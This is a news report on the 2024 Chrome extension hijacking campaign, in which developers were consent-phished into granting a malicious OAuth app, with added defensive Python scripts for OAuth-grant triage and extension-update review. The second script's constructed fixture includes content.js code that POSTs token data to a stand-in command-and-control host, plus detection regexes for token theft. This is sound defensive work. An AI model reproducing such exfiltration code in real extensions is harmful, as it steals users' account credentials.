
At the end of December 2024, the Chrome extension from the Swiss security startup Cyberhaven and at least four other extensions were attacked by unknown hackers. At the time, Cyberhaven experts wrote that the attackers could have stolen confidential user data, including cookies and other users' sessions.
It has now become known that the scale of the attack was slightly wider. According to the latest data, the developers of at least 36 extensions, used by over 2,600,000 people, were hit by similar hacks.
According to reports from the affected developers, the malicious campaign began on December 5, 2024. However, researchers concluded that the attackers' control domains already existed in March 2024.
It turned out that the attacks on developers began with phishing emails in which the attackers used domains such as supportchromestore(.)com, forextensions(.)com and chromeforextension(.)com.
The emails were framed as being from Google, claiming that the extension violated Chrome Web Store policies and would soon be removed from the store. Developers were told that their product descriptions were misleading and that they now had to agree to Chrome Web Store policies.
If the developer clicked the Go To Policy button embedded in the email to see which policies they had violated, they were taken to a legitimate Google sign-in page that requested authorization for a malicious OAuth app. This page is part of Google's standard authorization flow and is designed to grant third-party apps permission to access certain account resources.
The attackers' malicious OAuth app, registered on the platform under the name Privacy Policy Extension, asked the victim for permission to manage extensions in the Chrome Web Store on behalf of their account.
Multi-factor authentication (MFA) did not help protect the accounts, because granting OAuth consent does not require a separate MFA approval, and the OAuth model assumes that the person fully understands the scope of the permissions they are granting and their potential consequences.
“Our employee followed standard process and inadvertently authorized a malicious third-party application,” explains a report on the attack published by Cyberhaven. “The employee had Google Advanced Protection enabled and MFA was enabled on his account. However, the employee did not receive MFA prompts. The employee’s Google credentials were not compromised.”
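Because the consent grant itself is what the attackers needed, and no MFA prompt fires for it, the grant record in the OAuth token audit log is the practical detection point. The following is an added example, not code from Cyberhaven or from the report: it triages a simplified token audit log for grants of high-risk scopes (the Chrome Web Store API scope among them) to apps that are not on an approved-app list or whose names borrow policy- and support-sounding words. The event shape, client IDs, log lines and the allowlist are all constructed for this example; the scope URLs are real Google API scopes.

```python
"""Triage OAuth consent grants in a (simplified, constructed) token audit log.
Field names loosely follow the app_name / client_id / scope parameters of
Google Workspace "token" audit events, flattened into one JSON object per line."""
import json

# Scopes that let an app act on the account, not just read a profile. The Chrome
# Web Store scope is the one this campaign needed; the rest are an assumed list
# of scopes that deserve the same review.
HIGH_RISK_SCOPES = {
    "https://www.googleapis.com/auth/chromewebstore",
    "https://mail.google.com/",
    "https://www.googleapis.com/auth/drive",
    "https://www.googleapis.com/auth/admin.directory.user",
}

# Words a consent-phishing app name tends to borrow to look official (heuristic).
LURE_WORDS = ("policy", "privacy", "google", "chrome", "web store", "support", "verification")


def parse_events(log_text):
    """One JSON object per non-empty line -> list of dicts."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def assess_grant(event, approved_client_ids=frozenset()):
    """Return a finding for an 'authorize' event, or None for other event types."""
    if event.get("event") != "authorize":
        return None
    scopes = set(event.get("scope", []))
    risky = sorted(scopes & HIGH_RISK_SCOPES)
    app_name = event.get("app_name", "")
    lure = [w for w in LURE_WORDS if w in app_name.lower()]
    approved = event.get("client_id") in approved_client_ids

    reasons = []
    if risky:
        reasons.append(f"high-risk scope(s): {risky}")
    if lure:
        reasons.append(f"app name uses lure words: {lure}")
    if not approved:
        reasons.append("client_id not on the approved-app list")

    # An unapproved app holding a high-risk scope is the case to act on first;
    # a risky scope on an approved app, or a lure-like name alone, is a review item.
    if risky and not approved:
        severity = "high"
    elif risky or lure:
        severity = "medium"
    else:
        severity = "low"
    return {"time": event.get("time"), "actor": event.get("actor"), "app_name": app_name,
            "client_id": event.get("client_id"), "severity": severity, "reasons": reasons}


def triage_log(log_text, approved_client_ids=frozenset()):
    """All findings, most severe first."""
    order = {"high": 0, "medium": 1, "low": 2}
    findings = [f for f in (assess_grant(e, approved_client_ids) for e in parse_events(log_text)) if f]
    return sorted(findings, key=lambda f: order[f["severity"]])


# Constructed sample log: one consent-phishing grant, one approved low-risk app,
# one approved app with a broad scope, and a revoke event that is not a grant.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"time": "2024-12-05T09:12:44Z", "actor": "dev@example.com", "event": "authorize",
     "app_name": "Privacy Policy Extension", "client_id": "constructed-client-1",
     "scope": ["https://www.googleapis.com/auth/chromewebstore"]},
    {"time": "2024-12-05T10:01:03Z", "actor": "pm@example.com", "event": "authorize",
     "app_name": "Team Calendar Sync", "client_id": "constructed-client-2",
     "scope": ["https://www.googleapis.com/auth/calendar.readonly"]},
    {"time": "2024-12-05T11:30:17Z", "actor": "ops@example.com", "event": "authorize",
     "app_name": "Backup Tool", "client_id": "constructed-client-3",
     "scope": ["https://www.googleapis.com/auth/drive"]},
    {"time": "2024-12-05T12:00:00Z", "actor": "pm@example.com", "event": "revoke",
     "app_name": "Old Notes App", "client_id": "constructed-client-9", "scope": []},
])
APPROVED = frozenset({"constructed-client-2", "constructed-client-3"})

if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG, APPROVED):
        print(finding["severity"].upper(), finding["actor"], finding["app_name"], finding["reasons"])
```

A "high" finding here is the signal to revoke the app's token for that account and to check whether the account's Chrome Web Store items received a new version around the grant time; the allowlist is the control that keeps routine grants out of the queue.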
After gaining access to the developer's account, the attackers modified the extension by injecting two malicious files (worker.js and content.js) containing code to steal Facebook account data. The compromised extension was then published to the Chrome Web Store as a new version.
According to Extension Total, 36 extensions fell victim to such attacks, but indicators of compromise suggest that more developers may have been affected.
The malicious code injected into the extensions reportedly tried to obtain the Facebook ID, access token, account information, advertising account information, and business account information of the extension's users. It also added a click-event listener specifically on Facebook pages and looked for QR code images related to two-factor authentication or CAPTCHA. All information stolen in this way was eventually transmitted to the hackers' command-and-control server.
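For a team that reviews extension updates before they reach user browsers, the behaviours just described translate into a small set of checks: script files that were not in the last reviewed version, code that touches Facebook access tokens, advertising or business account APIs, click handlers and QR/CAPTCHA images, a network call that could carry data out, and manifest permissions that cover facebook.com. The script below is an added example, not code from the report or from any of the affected extensions; the regexes are heuristics written for this example, the scoring weights are assumptions, and both sample bundles (a benign extension and the same one after a constructed malicious update) are made up.

```python
"""Triage an unpacked Chrome extension for the indicators described above.
All sample files in this block are constructed for the example."""
import json
import re
from pathlib import Path

# File names the report says were injected into the compromised extensions.
INJECTED_NAMES = {"worker.js", "content.js"}

# Content heuristics (constructed for this example, not published signatures).
PATTERNS = {
    "facebook_domain": re.compile(r"\bfacebook\.com\b", re.I),
    "access_token": re.compile(r"\baccess_token\b", re.I),
    "ad_or_business_api": re.compile(r"\b(adaccounts|businesses|business_users)\b", re.I),
    "click_listener": re.compile(r"addEventListener\(\s*['\"]click['\"]"),
    "qr_or_captcha": re.compile(r"\b(qr|captcha|two.?factor|2fa)\b", re.I),
    "fetch_to_url": re.compile(r"(fetch|XMLHttpRequest|sendBeacon)\s*\(?[^\n]*https?://", re.I),
}


def load_extension_dir(root):
    """Read an unpacked extension from disk into {relative_path: text}."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): p.read_text(errors="replace")
            for p in root.rglob("*") if p.is_file()}


def _file_score(path, matched, is_new):
    """Weight per-file findings (assumed weights); a lone click handler scores 0."""
    score = 0
    facebook_related = "facebook_domain" in matched or "access_token" in matched
    if is_new and Path(path).name in INJECTED_NAMES:
        score += 3
    if "access_token" in matched and ("facebook_domain" in matched or "fetch_to_url" in matched):
        score += 2
    if facebook_related and "click_listener" in matched:
        score += 1
    if facebook_related and "qr_or_captcha" in matched:
        score += 1
    if "ad_or_business_api" in matched:
        score += 1
    return score


def analyze_extension(files, baseline_files=None):
    """files: {relative_path: text}. baseline_files: paths present in the last
    reviewed version, or None when no baseline exists. Returns a triage summary."""
    baseline = set(baseline_files or ())
    new_files = sorted(set(files) - baseline) if baseline else []
    manifest = json.loads(files.get("manifest.json", "{}"))
    hosts = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.extend(cs.get("matches", []))
    facebook_hosts = [h for h in hosts if "facebook" in h.lower()]

    hits, score = {}, (2 if facebook_hosts else 0)
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        matched = [name for name, rx in PATTERNS.items() if rx.search(text)]
        if matched:
            hits[path] = matched
            score += _file_score(path, matched, path in new_files)

    verdict = ("likely-compromised" if score >= 6
               else "needs-review" if score >= 2 else "clean")
    return {"new_files": new_files, "facebook_hosts": facebook_hosts,
            "hits": hits, "score": score, "verdict": verdict}


# Constructed sample: a benign extension and the same one after a malicious update.
BENIGN = {
    "manifest.json": json.dumps({"manifest_version": 3, "name": "Example (constructed)",
                                 "version": "1.0", "action": {"default_popup": "popup.html"}}),
    "popup.html": "<script src='popup.js'></script>",
    "popup.js": "document.getElementById('go').addEventListener('click', () => {});",
}
BASELINE_FILES = set(BENIGN)
COMPROMISED = dict(BENIGN)
COMPROMISED["manifest.json"] = json.dumps({
    "manifest_version": 3, "name": "Example (constructed)", "version": "1.1",
    "host_permissions": ["https://*.facebook.com/*"],
    "background": {"service_worker": "worker.js"},
    "content_scripts": [{"matches": ["https://www.facebook.com/*"], "js": ["content.js"]}],
})
COMPROMISED["worker.js"] = (
    "chrome.runtime.onMessage.addListener((t) => "
    "fetch('https://graph.facebook.com/me?access_token=' + t));")
COMPROMISED["content.js"] = (
    "document.addEventListener('click', () => {});\n"
    "const info = { access_token: null, adaccounts: [] };\n"
    "const qr = document.querySelector('img[alt*=\"QR\"]');\n"
    "fetch('https://c2.example.invalid/collect', { method: 'POST', body: JSON.stringify(info) });")

if __name__ == "__main__":
    for label, bundle in (("benign", BENIGN), ("updated", COMPROMISED)):
        print(label, json.dumps(analyze_extension(bundle, BASELINE_FILES), indent=2))
```

The baseline comparison is the part that matters most: a compromised update adds files and permissions that the previously approved version did not have, so keeping the file list (or better, file hashes) of each approved version lets the review catch the change even when the string heuristics miss it. `load_extension_dir` builds the same mapping from an unpacked extension on disk.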